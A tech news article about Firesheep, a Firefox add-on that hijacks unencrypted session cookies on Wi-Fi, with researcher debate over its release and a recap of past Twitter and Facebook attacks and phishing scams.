Firesheep. That's the name of a new Firefox add-on that lets bad guys
scan a Wi-Fi network and hijack access to Facebook, Twitter and other
web services. Eric Butler, a freelance developer in Seattle, created the
add-on and released it at the ToorCon security conference in San Diego
over the weekend.
"It's extremely common for web sites to protect your password by
encrypting the initial log-in, but surprisingly uncommon for web sites
to encrypt everything else. This leaves the cookie -- and the user --
vulnerable," Butler noted.
"Facebook is constantly rolling out new 'privacy' features in an endless
attempt to quell the screams of unhappy users, but what's the point
when someone can just take over an account entirely?" he asked. "Twitter
forced all third-party developers to use OAuth,
then immediately released (and promoted) a new version of their
insecure web site. When it comes to user privacy, SSL is the elephant in
the room."
Grey-Hat Tactics
Butler released Firesheep to demonstrate how serious the problem is, but some security researchers don't agree with his tactics. In fact, Beth Jones, a senior threat researcher at Sophos, called it a grey-hat approach.
"I understand that researchers are trying to prove the point that these
social-media sites need to secure their users a little more, but at the
same time they've made it that much easier for people who are hackers --
or for people who even want to dabble in hacking -- to do so," Jones
said. "There are better and more ethical ways to approach this than just
fanning the flames."
Jones does agree that Twitter, Facebook and other web sites could do
more to keep users secure. She pointed to Google's efforts to roll out SSL
over Gmail. The SSL encrypts cookies, so even if malicious hackers can
see the cookie, they can't see what's in it. When Google took this security measure, she said, Gmail still worked well and the precaution came at little expense to Google.
Should Facebook, Twitter Do More?
Twitter has had its fair share of breaches. In September, the
onMouseOver incident left Twitter flooded with posts that tapped into a
flaw in the site's programming and dispatched pornography and spread
worms to innocent tweeters.
In February, cybercriminals relentlessly attacked Twitter. Many Twitter
users received a direct message or saw tweets with phrases like "This
you???" or "LOL is this you" followed by a link. They were warned not to
click through because the destination is a phishing site designed to steal personal information.
Facebook has seen numerous attacks as well. In March, cybercriminals ran
scams that targeted Facebook users, college basketball fans, and
celebrity gossip watchers. One widespread attack was a common ploy
security researchers call the Facebook Password Reset Scam. The
cybercriminals send an e-mail addressed to "user of Facebook" that
reads, "Because of the measures taken to provide safety to our clients,
your password has been changed. You can find your new password in the
attached document."
"I think Facebook and Twitter could be doing more and better, but I also
understand it takes time," Jones said. "There are certain protocols
they have to go through to get everything rolled out, but I think it's
going to happen eventually. I am also very cognizant of the fact that,
as a whole, people don't necessarily care."